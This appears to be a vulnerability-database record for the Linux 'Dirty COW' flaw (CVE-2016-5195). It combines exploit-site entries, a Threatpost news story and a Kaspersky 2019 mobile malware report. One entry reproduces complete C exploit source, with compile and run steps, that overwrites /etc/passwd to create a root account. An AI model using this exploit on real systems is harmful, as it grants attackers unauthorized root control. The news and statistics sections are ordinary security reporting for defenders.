printInfo(argv[0]);\r\n }\r\n }\r\n \r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n \r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26431"}, {"lastseen": "2018-03-28T03:24:54", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/p", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26430", "id": "1337DAY-ID-26430", "sourceData": "// EDB-Note: After getting a shell, doing \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\" may make the system more stable.\r\n//\r\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\r\n// as a base and automatically generates a new passwd line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// The original /etc/passwd file is then backed up to /tmp/passwd.bak\r\n// and overwrites the root account with the generated line.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// To use this exploit modify the user values according to your needs.\r\n// The default is \"firefart\".\r\n//\r\n// Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// Compile with:\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// Then run the newly create binary by either doing:\r\n// \"./dirty\" or \"./dirty my-new-password\"\r\n//\r\n// Afterwards, you can either \"su firefart\" or \"ssh 
[email\u00a0protected]\"\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!\r\n// mv /tmp/passwd.bak /etc/passwd\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n \r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n \r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n \r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n \r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n \r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n \r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n \r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n \r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! 
Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n \r\n char ch;\r\n FILE *source, *target;\r\n \r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n \r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n \r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n \r\n fclose(source);\r\n fclose(target);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n \r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n \r\n char *plaintext_pw;\r\n \r\n if (argc >= 2) {\r\n plaintext_pw = argv[1];\r\n printf(\"Please enter the new password: %s\\n\", plaintext_pw);\r\n } else {\r\n plaintext_pw = getpass(\"Please enter the new password: \");\r\n }\r\n \r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n \r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n 
ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n \r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/26430", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:34", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "A nine-year-old Linux vulnerability that affects most of the major distributions has been recently used in public attacks. The flaw, nicknamed Dirty Cow because it lives in the copy-on-write (COW) feature in Linux, is worrisome because it can give a local attacker root privileges.\n\nWhile the Linux kernel was patched on Wednesday, the major distributions are preparing [patches](<https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>). [Red Hat](<https://bugzilla.redhat.com/show_bug.cgi?id=1384344>), for example, told Threatpost that it has a temporary mitigation available through the kpatch dynamic kernel patching service that customers can receive through their support contact.\n\nDirty Cow is a privilege escalation vulnerability in copy-on-write, [CVE-2016-5195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>). A race condition exists that allows local users to gain write-access to read-only memory and elevate their privileges to root.\n\nExploits were discovered recently by researcher Phil Oester, who published an informational website on the bug that includes links to [details on the flaw and a proof-of-concept exploit](<http://dirtycow.ninja/>). 
Oester said the bug has been in the kernel since version 2.6.22, released in 2007.\n\n\u201cThis flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set,\u201d Oester said on his [website](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>).\n\nRed Hat Security Strategist Josh Bressers said the vulnerability is serious but since it is not remotely exploitable, it\u2019s less critical than Heartbleed and other Internet-wide bugs admins have dealt with in the last two-plus years.\n\n\u201cIt\u2019s not on-fire bad like some of the other bugs that have names,\u201d Bressers said. \u201cAn attacker has to have broken in already and then exercise the flaw to gain root. It\u2019s serious, but much less serious because you essentially need two exploits versus just one.\u201d\n\n[Copy-on-write](<http://stackoverflow.com/questions/628938/what-is-copy-on-write>) is a feature used in programming across platforms that manages resources in memory. Multiple processes may share that same page until a user needs to write to it, which is known as marking the page dirty, Bressers said.\n\n\u201cThe problem comes down to the fact that there was a logic error in the Linux kernel that said you could exercise a race condition so that before the kernel separates pages that are marked dirty, it would let you write to the original page,\u201d Bressers said. \u201cAt the same time, another part of the process is writing to it. It allows you to change a file on the disk you shouldn\u2019t be able to change.\u201d\n\nBressers said that attackers would also be limited in virtual machines and containers. For example, they would not be able to escape a virtual machine and attack the host server.\n\n\u201cCurrent exploits don\u2019t work in containers given the way they work,\u201d Bressers said. 
\u201cIf it could be exploited in the container, the containment technology will keep you in the container. You need something else to get out. So it\u2019s clear, newer technology is useful as a mitigation in this case.\u201d\n", "modified": "2016-10-21T17:40:51", "published": "2016-10-21T11:21:36", "id": "THREATPOST:E5B29B24D99DF66802D64661812BCFB9", "href": "https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/", "type": "threatpost", "title": "Serious Dirty Cow Linux Vulnerability Under Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2020-03-24T11:38:55", "bulletinFamily": "blog", "cvelist": ["CVE-2016-5195"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Figures of the year\n\nIn 2019, Kaspersky mobile products and technologies detected:\n\n * 3,503,952 malicious installation packages.\n * 69,777 new mobile banking Trojans.\n * 68,362 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn summing up 2019, two trends in particular stick out:\n\n * Attacks on users' personal data became more frequent.\n * Detections of Trojans on the most popular application marketplaces became more frequent.\n\nThis report discusses each in more detail below, with examples and statistics.\n\n### Attacks on personal data: stalkerware\n\nOver the past year, the number of attacks on the personal data of mobile device users increased by half: from 40,386 unique users in 2018 to 67,500 in 2019. 
This is not about classic spyware or Trojans, but so-called [stalkerware](<https://encyclopedia.kaspersky.com/glossary/stalkerware-spouseware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\n_Number of unique users attacked by stalkerware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152357/mobile_report_2019_01-en-stalkerware-users.png>)\n\nStalkerware can be divided into two major categories:\n\n * Trackers.\n * Full-fledged tracking apps.\n\nThe creators of trackers generally focus on two main features: tracking victims' coordinates and intercepting text messages. Until recently, many such apps, mostly free, were available on the official Google Play marketplace. After [Google Play changed its policy](<https://play.google.com/about/privacy-security-deception/malicious-behavior/>) in late 2018, most of them were removed from the store, and most developers pulled support for their products. However, such trackers can still be found on their developers' and third-party sites.\n\nIf such an app gets onto a device, messages and data about the user's location become accessible to third parties. These third parties are not necessarily only those tracking the user: the client-server interaction of some services ignores even the minimum security requirements, allowing anyone to gain access to the accumulated data.\n\nThe situation of full-fledged stalkerware is somewhat different: there are no such apps on Google Play, but they are actively supported by developers. These tend to be commercial solutions with extensive spying capabilities. They can harvest almost any data on a compromised device: photos (both entire archives and individual pictures, for example, taken at a certain location), phone calls, texts, location information, screen taps (keylogging), and so on. 
\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152711/mobile_report_2019_stalk_screen.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the capabilities of the software_\n\nMany apps exploit root privileges to extract messaging history from protected storage in social networking and instant messaging applications. If it cannot gain the required access, the stalkerware can take screenshots, log screen taps and even extract the text of incoming and outgoing messages from the windows of popular services using the Accessibility feature. One example is the commercial spyware app Monitor Minor.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152741/mobile_report_2019_stalk_screen_features.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the software's ability to intercept data from social networks and messengers_\n\nThe developers of the [commercial spyware FinSpy](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) went one step further by adding a feature to intercept correspondence in secure messengers, such as Signal, Threema and others. To ensure interception, the app independently obtains root privileges by exploiting the vulnerability CVE-2016-5195, aka \"Dirty Cow\". The expectation is that the victim is using an old device with an outdated operating system kernel in which the exploit can escalate privileges to root.\n\nIt is worth noting that the user base of messaging apps includes hundreds of millions. Classic calls and texts are being used less and less, and communication \u2014 be it text messages or voice/video calls \u2014 is gradually moving to instant messaging applications. 
Hence the rising interest in data stored in such apps.\n\n### Attacks on personal data: advertising apps\n\nIn 2019, we observed a significant increase in the number of [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) threats, one purpose being to harvest personal data on mobile devices.\n\nThe statistics show that the number of users attacked by adware in 2019 is roughly unchanged from 2018. \n\n_Number of users attacked by adware in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152401/mobile_report_2019_02-en-adware-users.png>)\n\nAt the same time, the number of detected adware installation packages almost doubled from 2018.\n\n_Number of detected adware installation packages in 2018 and 2019._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152406/mobile_report_2019_03-adware-pkg.png>)\n\nThese indicators typically correlate, but not in the case of adware. This can be explained by several factors:\n\n * Adware installation packages are generated automatically and spread literally everywhere, but for some reason do not reach the target audience. It is possible that they get detected immediately after being generated and cannot propagate further. \n * Often, such apps contain nothing useful \u2014 just an adware module; so the victim immediately deletes them, assuming that they allow removing themselves.\n\nNevertheless, it is the second successive year that adware has appeared in our Top 3 detected threats. KSN statistics confirm it to be one of the most common types of threats: four places in our Top 10 mobile threats by number of users attacked in 2019 are reserved for adware-class apps, with one member of the family, HiddenAd, taking the third. 
\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 35,83 \n2 | Trojan.AndroidOS.Boogr.gsh | 8,30 \n3 | AdWare.AndroidOS.HiddenAd.et | 4,60 \n4 | AdWare.AndroidOS.Agent.f | 4,05 \n5 | Trojan.AndroidOS.Hiddapp.ch | 3,89 \n6 | DangerousObject.AndroidOS.GenericML | 3,85 \n7 | AdWare.AndroidOS.HiddenAd.fc | 3,73 \n8 | Trojan.AndroidOS.Hiddapp.cr | 2,49 \n9 | AdWare.AndroidOS.MobiDash.ap | 2,42 \n10 | Trojan-Dropper.AndroidOS.Necro.n | 1,84 \n \n_*Share of all users attacked by this type of malware in the total number of users attacked._\n\nIn 2019, mobile adware developers not only generated tens of thousands of packages, but also technically enhanced their products, in particular through the addition of techniques to bypass operating system restrictions. \n\nFor example, Android imposes certain restrictions on background operation of applications for battery-saving reasons. This negatively impacts the operation of various threats, including adware apps that like to lurk in the background and wait for, say, a new banner to arrive from C&C. The introduction of such restrictions made it impossible for apps to show ads outside the context of their own window, thus starving most adware of oxygen.\n\nThe creators of the KeepMusic adware family found a smart workaround. To bypass the restrictions, their software does not request permissions like, for example, malware does. Instead, the program starts looping an MP3 file that plays silence. The operating system decides that the music player is running, and does not terminate the KeepMusic background process. As a result, the adware can request a banner from the server and display it any time. \n\n### Attacks on personal data: exploiting access to Accessibility\n\nThe year 2019 saw the appearance of the first specimen of mobile financial malware (Trojan-Banker.AndroidOS.Gustuff.a), featuring enhanced autonomy. 
Until then, two methods had been used to steal money from bank accounts: \n\n * **Via SMS banking on the victim end.** This is an autonomous theft technique that requires only information about the transfer recipient. This data the bot can either store in its body or receive as a command from C&C. The Trojan infects the device and sends a text with a transfer request to a special bank phone number. The bank then automatically transfers the funds to the recipient from the device owner's account. Due to the increase in such theft, limits on mobile transfers have been tightened, so this attack vector has been relegated to backup.\n * **By stealing online banking credentials.** This has been the dominant method in recent years. Cybercriminals display a phishing window on the victim's device that mimics the bank's login page and reels in the victim's credentials. In this case, the cybercriminals need to carry out the transaction themselves, using the app on their own mobile device or a browser. It is possible that the bank's anti-fraud systems can detect the abnormal activity and block it, leaving the attackers empty-handed even if the victim's device is infected. \n\nIn 2019, cybercriminals mastered a third method: stealing by manipulating banking apps. First, the victim is persuaded to run the app and sign in, for example, using a fake push notification supposedly from the bank. Tapping the notification does indeed open the banking app, which the attackers, using Accessibility, gain full control over, enabling them to fill out forms, tap buttons, etc. Moreover, the bot operator does not need to do anything, because the malware performs all actions required. Such transactions are trusted by banks, and the maximum transfer amount can exceed the limits of SMS banking by an order of magnitude. As a result, the cybercriminals can clean out the account in one go. \n\nStealing funds from bank accounts is just one malicious use of Accessibility. 
In effect, any malware with these permissions can control all on-screen processes, while any Android app is basically a visual representation of buttons, data entry forms, information display, and so on. Even if developers implement their own control elements, such as a slider that needs to be moved at a certain speed, this too can be done using Accessibility commands. Thus, cybercriminals have tremendous leeway to create what are perhaps the most dangerous classes of mobile malware: spyware, banking Trojans and ransomware Trojans.\n\nThe misuse of the Accessibility features poses a serious threat to users' personal data. Where previously cybercriminals had to [overlay](<https://encyclopedia.kaspersky.com/glossary/overlaying-overlay-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) phishing windows and request a bunch of permissions in order to steal personal information, now victims themselves output all necessary data to the screen or enter it in forms, where it can be easily gleaned. And if the malware needs more, it can open the Settings section by itself, tap a few buttons, and obtain the necessary permissions. \n\n### Mobile Trojans on popular marketplaces: Google Play\n\nSlipping malware into the main Android app store delivers much better results than social engineering victims into installing apps from third-party sources. In addition, this approach enables attackers to:\n\n * Bypass SafetyNet, Android's built-in antivirus protection. If a user downloads an app from Google Play, the likelihood that it will be installed without additional requests \u2014 for example, to disable the built-in protection under an imaginary pretext \u2014 is very high. The only thing that can protect the user from infection in that situation is a third-party security solution.\n * Overcome psychological barriers. 
Official app stores enjoy far greater trust than third-party \"markets,\" and act as store windows of sorts that can be used for distributing software much more efficiently.\n * Target victims without unnecessary spending. Google Play can be used to host fakes that visually mimic, say, popular banking apps. This was the distribution vector used in a spate of attacks on mobile users in Brazil: we detected [numerous malicious programs](<https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>) on Google Play under the guise of mobile apps for Brazilian banks.\n\nIn addition to malicious doppelgangers, cybercriminals deployed several other tricks to maximize device infection rates: \n\n * The [case of CamScanner](<https://securelist.com/dropper-in-google-play/92496/>) showed that an app's legitimate behavior can be supplemented with malicious functions by updating its code for handling advertising. This could be described as the most sophisticated attack vector, since its success depends on a large number of factors, including the user base of the host app, the developer's trust in third-party advertising code and the type of malicious activity. \n * [Another example](<https://securelist.com/mobile-subscriptions/91211/>) demonstrates that attackers sometimes upload to Google Play fairly well-behaved apps from popular user categories. In this case, it was photo editors. \n * The most depressing case involves a Trojan from the Joker family, of which we have found many samples on Google Play, and still are. Deploying the tactic of mass posting, cybercriminals uploaded apps under all kinds of guises: from wallpaper-changing tools and security solutions to popular games. In some cases, the Trojan scored hundreds of thousands of downloads. 
No other attack vector can reach this kind of audience within such a short space of time.\n\nThe good news is that Google and the antivirus industry have [teamed up](<https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html>) to fight threats on the site. This approach should prevent most malware from penetrating the official Google app store.\n\n## Statistics\n\nIn 2019, we discovered 3,503,952 mobile malicious installation packages, which is 1,817,190 less than in the previous year. We have not detected so few mobile threats since 2015.\n\n_Number of mobile malicious installation packages for Android in 2015\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152410/mobile_report_2019_04-total-apk.png>)\n\nFor three consecutive years, we have seen an overall decline in the number of mobile threats distributed as installation packages. The picture largely depends on specific cybercriminal campaigns: some have become less active, others have completely ceased, and new players have yet to gain momentum. 
\n\nThe situation is similar with the number of attacks using mobile threats: whereas in 2018 we observed a total of **116.5 million** attacks, in 2019 the figure was down to **80 million**.\n\n_Number of attacks defeated by Kaspersky mobile solutions in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152415/mobile_report_2019_05-en-total-attacks.png>)\n\nThe figures were back to the year before, before the start of the Asacub banking Trojan epidemic.\n\nSince the number of attacks correlates with the number of users attacked, we observed a similar picture for this indicator.\n\n_Number of users attacked by mobile malware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152419/mobile_report_2019_06-en-total-attack-users.png>)\n\n_Geography of attacked users in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152424/mobile_report_2019_07-en-geo-attack-users.png>)\n\n**Top 10 countries by share of users attacked by mobile malware:**\n\nCountry* | %** \n---|--- \nIran | 60.64 \nPakistan | 44.43 \nBangladesh | 43.17 \nAlgeria | 40.20 \nIndia | 37.98 \nIndonesia | 35.12 \nNigeria | 33.16 \nTanzania | 28.51 \nSaudi Arabia | 27.94 \nMalaysia | 27.36 \n \n_*Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._ \n_**Unique users attacked in the country as a percentage of all users of Kaspersky mobile security solutions in the country._\n\nIn 2019, Iran (60.64%) again topped the list for the third year in a row. The most common threats in that country come from adware and potentially unwanted software: Trojan.AndroidOS.Hiddapp.bn, AdWare.AndroidOS.Agent.fa, and RiskTool.AndroidOS.Dnotua.yfe.\n\nPakistan (44.43%) climbed from seventh to second place, mainly on the back of a rise in the number of users attacked by adware. 
The largest contribution was made by members of the AdWare.AndroidOS.HiddenAd family. A similar picture can be seen in Bangladesh (43.17%), whose share has grown due to the same adware families. \n\n### Types of mobile threats\n\n_Distribution of new mobile threats by type in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152430/mobile_report_2019_08-en-threat-types.png>)\n\nIn 2019, the share of RiskTool-class threats decreased by 20 p.p. (32.46%). We believe the main reason to be the sharp drop in the generation of threats from the SMSreg family. A characteristic feature of this family is payments via SMS: for example, money transfers or subscriptions to mobile services. Moreover, the user is not explicitly informed of the payment or money being charged to their mobile account. Whereas in 2018, we picked up 1,970,742 SMSreg installation packages, the number decreased by an order of magnitude to 193,043 in 2019. At the same time, far from declining, the number of packages of other members of this class of threats increased noticeably.\n\n| Name of family | %* \n---|---|--- \n1 | Agent | 27.48 \n2 | SMSreg | 16.89 \n3 | Dnotua | 13.83 \n4 | Wapron | 13.73 \n5 | SmsSend | 9.15 \n6 | Resharer | 4.62 \n7 | SmsPay | 3.55 \n8 | PornVideo | 2.51 \n9 | Robtes | 1.23 \n10 | Yoga | 1.03 \n \n_*Share of packages of this family in the total number of riskware-class packages detected in 2019._\n\nSkymobi and Paccy dropped out of the Top 10 families of potentially unwanted software; the number of installation packages of these families detected in 2019 decreased tenfold. Their creators likely minimized or even ceased their development and distribution. However, a new player appeared: the Resharer family (4.62%), which ranked sixth. 
This family is noted for its self-propagation through posting information about itself on various sites and mailing it to the victim's contacts.\n\nAdware demonstrated the most impressive growth, up by 14 p.p. The main source of this growth was HiddenAd (26.81%); the number of installation packages of this family increased by two orders of magnitude against 2018. \n\n| Name of family | %* \n---|---|--- \n1 | HiddenAd | 26.81 \n2 | MobiDash | 20.45 \n3 | Ewind | 16.34 \n4 | Agent | 15.27 \n5 | Dnotua | 5.51 \n6 | Kuguo | 1.36 \n7 | Dowgin | 1.28 \n8 | Triada | 1.20 \n9 | Feiad | 1.01 \n10 | Frupi | 0.94 \n \n_*Share of packages of this family in the total number of adware-class packages detected in 2019._\n\nSignificant growth also came from the MobiDash (20.45%) and Ewind (16.34%) families. Meanwhile, the Agent family (15.27%), which held a leading position in 2018, dropped to fourth place.\n\nCompared to 2018, the number of mobile Trojans detected decreased sharply. A downward trend has been observed for two consecutive years now, yet droppers remain one of the most numerous malware classes. The [Hqwar family](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) showed the most notable decrease: down from 141,000 packages in 2018 to 22,000 in 2019. At the same time, 2019 saw the debut of the Ingopack family: we detected 115,654 samples of this dropper. \n\nMeanwhile, the share of Trojan-class threats rose by 6 p.p., with the two most numerous malware families of this class being Boogr and Hiddapp. The Boogr family contains various Trojans that have been detected using machine-learning (ML) technology. A feature of the Hiddapp family is that it hides its icon in the list of installed apps while continuing to run in the background.\n\nThe share of mobile ransomware Trojans slightly increased. The Top 3 families of this class of threats remained the same as in 2018: Svpeng, Congur, and Fusob \u2014 in that order. 
\n\n### Top 20 mobile malware programs\n\nThe following malware rankings omit potentially unwanted software, such as RiskTool and AdWare.\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 49.15 \n2 | Trojan.AndroidOS.Boogr.gsh | 10.95 \n3 | Trojan.AndroidOS.Hiddapp.ch | 5.19 \n4 | DangerousObject.AndroidOS.GenericML | 5.08 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 3.45 \n6 | Trojan.AndroidOS.Hiddapp.cr | 3.28 \n7 | Trojan-Banker.AndroidOS.Asacub.snt | 2.35 \n8 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.10 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 1.76 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.66 \n11 | Trojan-Downloader.AndroidOS.Helper.a | 1.65 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.60 \n13 | Trojan-Downloader.AndroidOS.Necro.b | 1.59 \n14 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n15 | Exploit.AndroidOS.Lotoor.be | 1.46 \n16 | Trojan.AndroidOS.Hiddapp.cf | 1.35 \n17 | Trojan.AndroidOS.Dvmap.a | 1.33 \n18 | Trojan-Banker.AndroidOS.Agent.ep | 1.31 \n19 | Trojan.AndroidOS.Agent.rt | 1.28 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.14 \n \n_*Share of users attacked by this type of malware out of all attacked users_\n\nAs we wrap up the year 2019, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (49.15%), which we use for malware detected with cloud technology. The verdict is applied where the antivirus databases still have no signatures or heuristics for malware detection. This way, the most recent malware is uncovered.\n\nIn second place came the verdict Trojan.AndroidOS.Boogr.gsh (10.95%). This verdict is assigned to files recognized as malicious by our ML-based system. Another result of this system's work is objects with the verdict DangerousObject.AndroidOS.GenericML (5.08%, fourth place in the rating). This verdict is assigned to files whose structure is identical to that of malicious files.\n\nThird, sixth, and sixteenth places were taken by members of the Hiddapp family. 
We assign this verdict to any app that hides its icon in the list of apps immediately after starting. Subsequent actions of such apps may be anything from downloading or dropping other apps to displaying ads.\n\nFifth and thirteenth places went to members of the Necro family of droppers and loaders. In both threat classes, Necro members did not make it into the Top 10 by number of detected files. Even the weakened Hqwar family of droppers strongly outperformed Necro by number of generated objects. That said, users often encountered Necro members due to the family's penetration of Google Play.\n\nSeventh and tenth places went to the Asacub family of banking Trojans. Whereas at the start of the year, the Trojan's operators were still actively spreading the malware, starting in March 2019, we noticed a drop in this family's activity. \n\n_Number of unique users attacked by the Asacub mobile banking Trojan in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152434/mobile_report_2019_09-en-asacub-attacks.png>)\n\nEighth and fourteenth places were reserved for droppers in the Hqwar family. Their activity dropped significantly from 80,000 attacked users in 2018 to 28,000 in 2019. However, we continue to register infection attempts by this family, and do not rule out its return to the top.\n\n_Number of unique users attacked by the Hqwar mobile dropper in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152439/mobile_report_2019_10-en-hqwar-attacks.png>)\n\nIn ninth position is another dropper, this time from the Lezok family: Trojan-Dropper.AndroidOS.Lezok.p (1.76%). A notable difference between this Trojan and Hqwar is that the malware is already on the device before the device arrives at the store. This is evidenced by KSN statistics showing that the Trojan was most often detected in the system directory under the names PhoneServer, GeocodeService, and similar. 
\n\n| Path to the detected threat | Number of unique users attacked \n---|---|--- \n1 | /system/priv-app/PhoneServer/ | 49,688 \n2 | /system/priv-app/GeocodeService/ | 9747 \n3 | /system/priv-app/Helper/ | 6784 \n4 | /system/priv-app/com.android.telephone/ | 5030 \n5 | /system/priv-app/ | 1396 \n6 | /system/priv-app/CallerIdSearch/ | 1343 \n \nWhen the device is turned on, Lezok dumps its payload into the system; it does so even if the victim deletes the dumped files using regular OS tools or resets the device to the factory settings. The trick is that the Trojan forms part of the factory firmware and can reload (restore) the deleted files.\n\nThe final Trojan worthy of attention is Trojan-Downloader.AndroidOS.Helper.a (1.56%), which finished eleventh in the rankings. Despite claims to the contrary, it can be removed. However, the infected system contains another Trojan that installs a helper app, which cannot be removed that easily. According to KSN statistics, members of the Trojan-Downloader.AndroidOS.Triada and Trojan.AndroidOS.Dvmap families can act as delivery vehicles for the helper. After the victim removes the helper, a member of one of these two families loads and reinstalls it. \n\n### Mobile banking Trojans\n\nIn 2019, we detected 69,777 installation packages for mobile banking Trojans, which is half last year's figure. However, the share of banking Trojans out of all detected threats grew slightly as a consequence of the declining activity of other classes and families of mobile malware.\n\n_Number of installation packages of mobile banking Trojans detected by Kaspersky in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152443/mobile_report_2019_11-bankers-install-packages.png>)\n\nThe number of detected installation packages for banking Trojans as well as the number of attacks were influenced by the campaign to distribute the Asacub Trojan, whose activity has plummeted starting in April 2019. 
